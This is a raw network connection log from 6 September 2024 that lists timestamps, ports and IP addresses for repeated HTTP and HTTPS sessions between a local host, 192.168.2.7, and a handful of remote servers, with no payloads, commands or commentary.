Sep 6, 2024 09:58:25.720439911 CEST	49790	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:25.726825953 CEST	80	49790	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:25.971617937 CEST	80	49786	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:26.184376001 CEST	49786	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:26.382628918 CEST	80	49786	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:26.384321928 CEST	49786	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:26.384984970 CEST	80	49786	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:26.385337114 CEST	49786	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:26.387806892 CEST	443	49787	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:26.392724991 CEST	49791	80	192.168.2.7	185.215.113.100
Sep 6, 2024 09:58:26.393213034 CEST	49787	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:26.393224955 CEST	443	49787	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:26.393572092 CEST	443	49787	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:26.396157026 CEST	49787	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:26.396219969 CEST	443	49787	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:26.396275043 CEST	49787	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:26.398679018 CEST	80	49791	185.215.113.100	192.168.2.7
Sep 6, 2024 09:58:26.398838997 CEST	49791	80	192.168.2.7	185.215.113.100
Sep 6, 2024 09:58:26.399338007 CEST	49791	80	192.168.2.7	185.215.113.100
Sep 6, 2024 09:58:26.404165983 CEST	80	49791	185.215.113.100	192.168.2.7
Sep 6, 2024 09:58:26.436507940 CEST	443	49787	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:26.456512928 CEST	80	49790	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:26.456598997 CEST	49790	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:26.458545923 CEST	49790	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:26.463419914 CEST	80	49790	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:26.501117945 CEST	443	49787	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:26.501146078 CEST	443	49787	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:26.504355907 CEST	49787	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:26.504375935 CEST	443	49787	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:26.504404068 CEST	443	49787	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:26.504628897 CEST	49787	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:26.506361008 CEST	49792	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:26.511197090 CEST	80	49792	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:26.511275053 CEST	49792	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:26.511466026 CEST	49792	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:26.516457081 CEST	80	49792	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:26.592470884 CEST	443	49787	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:26.592497110 CEST	443	49787	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:26.592525959 CEST	443	49787	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:26.592534065 CEST	443	49787	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:26.592552900 CEST	49787	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:26.592622042 CEST	49787	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:26.592629910 CEST	443	49787	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:26.592837095 CEST	49787	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:26.594341040 CEST	443	49787	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:26.594352007 CEST	443	49787	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:26.594378948 CEST	443	49787	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:26.594419956 CEST	49787	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:26.594424963 CEST	443	49787	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:26.594427109 CEST	443	49787	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:26.594477892 CEST	49787	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:26.684227943 CEST	443	49787	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:26.684257030 CEST	443	49787	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:26.684494019 CEST	443	49787	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:26.684576988 CEST	443	49787	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:26.688019991 CEST	80	49790	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:26.688678026 CEST	49787	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:26.688715935 CEST	49787	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:26.690202951 CEST	49787	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:26.690222025 CEST	443	49787	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:26.691442966 CEST	49790	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:26.809741020 CEST	49790	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:26.810173035 CEST	49793	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:26.814969063 CEST	80	49790	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:26.815124989 CEST	80	49793	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:26.830125093 CEST	49790	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:26.830168962 CEST	49793	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:26.864778042 CEST	49793	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:26.869641066 CEST	80	49793	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:26.956727028 CEST	80	49792	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:27.071038961 CEST	49792	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:27.136054039 CEST	80	49791	185.215.113.100	192.168.2.7
Sep 6, 2024 09:58:27.136203051 CEST	49791	80	192.168.2.7	185.215.113.100
Sep 6, 2024 09:58:27.164499044 CEST	49791	80	192.168.2.7	185.215.113.100
Sep 6, 2024 09:58:27.387564898 CEST	49791	80	192.168.2.7	185.215.113.100
Sep 6, 2024 09:58:27.688446045 CEST	49791	80	192.168.2.7	185.215.113.100
Sep 6, 2024 09:58:28.186830044 CEST	80	49793	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:28.186940908 CEST	49793	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:28.187114954 CEST	80	49793	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:28.187537909 CEST	80	49793	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:28.188076019 CEST	49793	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:28.188159943 CEST	80	49791	185.215.113.100	192.168.2.7
Sep 6, 2024 09:58:28.188169956 CEST	49793	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:28.189707041 CEST	49793	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:28.190248966 CEST	80	49791	185.215.113.100	192.168.2.7
Sep 6, 2024 09:58:28.191181898 CEST	80	49791	185.215.113.100	192.168.2.7
Sep 6, 2024 09:58:28.195628881 CEST	80	49793	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:28.397156000 CEST	49795	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:28.397193909 CEST	443	49795	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:28.397313118 CEST	49795	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:28.397485971 CEST	49795	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:28.397501945 CEST	443	49795	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:28.458302021 CEST	80	49793	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:28.458585978 CEST	49793	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:28.486819983 CEST	80	49791	185.215.113.100	192.168.2.7
Sep 6, 2024 09:58:28.486890078 CEST	49791	80	192.168.2.7	185.215.113.100
Sep 6, 2024 09:58:28.566535950 CEST	49793	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:28.566869020 CEST	49796	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:28.571686029 CEST	80	49793	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:28.571791887 CEST	49793	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:28.571829081 CEST	80	49796	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:28.571913958 CEST	49796	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:28.572026014 CEST	49796	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:28.577092886 CEST	80	49796	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:29.060276985 CEST	443	49795	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:29.060590029 CEST	49795	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:29.060607910 CEST	443	49795	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:29.060981035 CEST	443	49795	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:29.065412045 CEST	49795	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:29.065552950 CEST	443	49795	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:29.065588951 CEST	49795	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:29.108499050 CEST	443	49795	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:29.167639017 CEST	443	49795	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:29.167663097 CEST	443	49795	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:29.176502943 CEST	443	49795	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:29.177928925 CEST	49795	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:29.177944899 CEST	443	49795	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:29.178401947 CEST	49795	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:29.257549047 CEST	443	49795	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:29.257569075 CEST	443	49795	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:29.257591963 CEST	443	49795	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:29.257600069 CEST	443	49795	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:29.257863998 CEST	49795	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:29.257878065 CEST	443	49795	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:29.258152962 CEST	49795	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:29.259516954 CEST	443	49795	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:29.259531975 CEST	443	49795	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:29.259550095 CEST	443	49795	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:29.259582043 CEST	443	49795	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:29.259644032 CEST	49795	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:29.259654045 CEST	443	49795	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:29.259708881 CEST	49795	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:29.269093990 CEST	80	49796	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:29.269257069 CEST	49796	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:29.269999981 CEST	49796	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:29.274832010 CEST	80	49796	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:29.347865105 CEST	443	49795	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:29.347882986 CEST	443	49795	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:29.347933054 CEST	443	49795	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:29.348018885 CEST	49795	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:29.348032951 CEST	443	49795	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:29.348196030 CEST	49795	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:29.348902941 CEST	443	49795	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:29.348927975 CEST	443	49795	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:29.348969936 CEST	443	49795	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:29.349019051 CEST	49795	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:29.349026918 CEST	443	49795	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:29.349055052 CEST	443	49795	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:29.349057913 CEST	49795	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:29.349102974 CEST	49795	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:29.349282980 CEST	49795	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:29.349304914 CEST	443	49795	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:29.496222019 CEST	80	49796	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:29.496340990 CEST	49796	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:29.612341881 CEST	49796	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:29.612653971 CEST	49797	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:29.617630005 CEST	80	49797	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:29.617660046 CEST	80	49796	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:29.617722988 CEST	49797	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:29.617763996 CEST	49796	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:29.617958069 CEST	49797	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:29.622828007 CEST	80	49797	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:30.316425085 CEST	80	49797	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:30.316560984 CEST	49797	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:30.317420959 CEST	49797	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:30.323157072 CEST	80	49797	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:30.544703007 CEST	80	49797	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:30.544787884 CEST	49797	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:30.664587021 CEST	49797	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:30.664871931 CEST	49798	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:30.669598103 CEST	80	49797	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:30.669763088 CEST	49797	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:30.669805050 CEST	80	49798	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:30.669908047 CEST	49798	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:30.670046091 CEST	49798	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:30.674945116 CEST	80	49798	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:31.391879082 CEST	80	49798	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:31.399517059 CEST	49798	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:31.435869932 CEST	49798	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:31.440654039 CEST	80	49798	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:31.671145916 CEST	80	49798	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:31.671335936 CEST	49798	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:31.788640976 CEST	49798	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:31.789030075 CEST	49799	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:32.089219093 CEST	49798	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:32.703562021 CEST	49798	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:32.803848028 CEST	49799	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:33.047503948 CEST	80	49799	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:33.047516108 CEST	80	49798	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:33.048018932 CEST	80	49798	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:33.048634052 CEST	80	49798	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:33.050936937 CEST	80	49798	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:33.051052094 CEST	80	49799	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:33.054399014 CEST	80	49798	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:33.057277918 CEST	80	49798	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:33.057291985 CEST	80	49799	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:33.057759047 CEST	49798	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:33.057759047 CEST	49798	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:33.057759047 CEST	49798	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:33.057760000 CEST	49798	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:33.057791948 CEST	49799	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:33.057866096 CEST	49799	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:33.062611103 CEST	80	49798	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:33.062617064 CEST	80	49798	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:33.062834024 CEST	80	49798	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:33.074306965 CEST	49799	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:33.079271078 CEST	80	49799	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:33.435750961 CEST	80	49791	185.215.113.100	192.168.2.7
Sep 6, 2024 09:58:33.450577974 CEST	49791	80	192.168.2.7	185.215.113.100
Sep 6, 2024 09:58:33.770903111 CEST	80	49799	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:33.770982027 CEST	49799	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:33.771676064 CEST	49799	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:33.776423931 CEST	80	49799	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:33.793262959 CEST	49791	80	192.168.2.7	185.215.113.100
Sep 6, 2024 09:58:34.000081062 CEST	80	49799	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:34.000152111 CEST	49799	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:34.142368078 CEST	49799	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:34.142702103 CEST	49800	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:34.147345066 CEST	80	49799	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:34.147516012 CEST	80	49800	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:34.161880016 CEST	49799	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:34.161880016 CEST	49800	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:34.169579983 CEST	49800	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:34.174345970 CEST	80	49800	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:34.876188040 CEST	80	49800	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:34.886063099 CEST	49800	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:34.887460947 CEST	49800	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:34.892766953 CEST	80	49800	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:35.127734900 CEST	80	49800	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:35.133456945 CEST	49800	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:35.198841095 CEST	49801	80	192.168.2.7	185.215.113.100
Sep 6, 2024 09:58:35.203694105 CEST	80	49801	185.215.113.100	192.168.2.7
Sep 6, 2024 09:58:35.208345890 CEST	49801	80	192.168.2.7	185.215.113.100
Sep 6, 2024 09:58:35.208547115 CEST	49801	80	192.168.2.7	185.215.113.100
Sep 6, 2024 09:58:35.214128971 CEST	80	49801	185.215.113.100	192.168.2.7
Sep 6, 2024 09:58:35.246347904 CEST	49800	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:35.246655941 CEST	49802	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:35.251478910 CEST	80	49800	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:35.251651049 CEST	49800	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:35.251725912 CEST	80	49802	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:35.251831055 CEST	49802	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:35.252019882 CEST	49802	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:35.256947994 CEST	80	49802	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:35.947556019 CEST	80	49802	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:35.947648048 CEST	49802	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:35.948371887 CEST	49802	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:35.953795910 CEST	80	49802	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:35.956075907 CEST	80	49801	185.215.113.100	192.168.2.7
Sep 6, 2024 09:58:35.956135035 CEST	49801	80	192.168.2.7	185.215.113.100
Sep 6, 2024 09:58:35.958380938 CEST	49801	80	192.168.2.7	185.215.113.100
Sep 6, 2024 09:58:35.963913918 CEST	80	49801	185.215.113.100	192.168.2.7
Sep 6, 2024 09:58:35.988604069 CEST	49786	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:35.993362904 CEST	80	49786	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:36.175971985 CEST	80	49802	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:36.176052094 CEST	49802	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:36.213625908 CEST	80	49801	185.215.113.100	192.168.2.7
Sep 6, 2024 09:58:36.213716030 CEST	49801	80	192.168.2.7	185.215.113.100
Sep 6, 2024 09:58:36.217622042 CEST	49801	80	192.168.2.7	185.215.113.100
Sep 6, 2024 09:58:36.289206982 CEST	49802	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:36.289573908 CEST	49803	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:36.294450998 CEST	80	49802	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:36.294548988 CEST	49802	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:36.295039892 CEST	80	49803	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:36.295968056 CEST	49803	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:36.296300888 CEST	49803	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:36.303735971 CEST	80	49803	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:36.966131926 CEST	49792	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:36.971508980 CEST	80	49792	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:37.000190020 CEST	80	49803	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:37.000319004 CEST	49803	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:37.003446102 CEST	49803	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:37.008290052 CEST	80	49803	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:37.583199978 CEST	80	49803	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:37.583265066 CEST	49803	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:37.585354090 CEST	80	49803	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:37.585406065 CEST	49803	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:37.691618919 CEST	49803	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:37.692049980 CEST	49804	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:37.787241936 CEST	80	49803	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:37.787302971 CEST	49803	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:37.788965940 CEST	80	49804	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:37.789057016 CEST	49804	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:37.789264917 CEST	49804	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:37.792938948 CEST	80	49803	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:37.794058084 CEST	80	49804	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:37.795068979 CEST	49803	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:38.430654049 CEST	49805	80	192.168.2.7	185.215.113.100
Sep 6, 2024 09:58:38.435672045 CEST	80	49805	185.215.113.100	192.168.2.7
Sep 6, 2024 09:58:38.435772896 CEST	49805	80	192.168.2.7	185.215.113.100
Sep 6, 2024 09:58:38.435874939 CEST	49805	80	192.168.2.7	185.215.113.100
Sep 6, 2024 09:58:38.440648079 CEST	80	49805	185.215.113.100	192.168.2.7
Sep 6, 2024 09:58:38.493581057 CEST	80	49804	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:38.493706942 CEST	49804	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:38.494590044 CEST	49804	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:38.499469042 CEST	80	49804	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:38.721224070 CEST	80	49804	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:38.721332073 CEST	49804	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:38.841250896 CEST	49804	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:38.841428041 CEST	49806	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:38.846262932 CEST	80	49806	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:38.846329927 CEST	49806	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:38.846417904 CEST	80	49804	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:38.846527100 CEST	49806	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:38.846576929 CEST	49804	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:38.851349115 CEST	80	49806	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:39.187503099 CEST	80	49805	185.215.113.100	192.168.2.7
Sep 6, 2024 09:58:39.188189030 CEST	49805	80	192.168.2.7	185.215.113.100
Sep 6, 2024 09:58:39.194432020 CEST	49805	80	192.168.2.7	185.215.113.100
Sep 6, 2024 09:58:39.199377060 CEST	80	49805	185.215.113.100	192.168.2.7
Sep 6, 2024 09:58:39.444019079 CEST	80	49805	185.215.113.100	192.168.2.7
Sep 6, 2024 09:58:39.446468115 CEST	49805	80	192.168.2.7	185.215.113.100
Sep 6, 2024 09:58:39.448827982 CEST	49805	80	192.168.2.7	185.215.113.100
Sep 6, 2024 09:58:39.548850060 CEST	80	49806	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:39.548908949 CEST	49806	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:39.549731016 CEST	49806	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:39.554552078 CEST	80	49806	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:39.781228065 CEST	80	49806	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:39.781290054 CEST	49806	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:39.892990112 CEST	49806	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:39.896415949 CEST	49807	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:39.900552034 CEST	80	49806	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:39.900763035 CEST	49806	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:39.902117014 CEST	80	49807	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:39.903924942 CEST	49807	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:39.903924942 CEST	49807	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:39.908817053 CEST	80	49807	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:40.608169079 CEST	80	49807	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:40.608417034 CEST	49807	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:40.612413883 CEST	49807	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:40.617239952 CEST	80	49807	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:40.839947939 CEST	80	49807	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:40.840193033 CEST	49807	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:40.924180031 CEST	49808	443	192.168.2.7	13.85.23.86
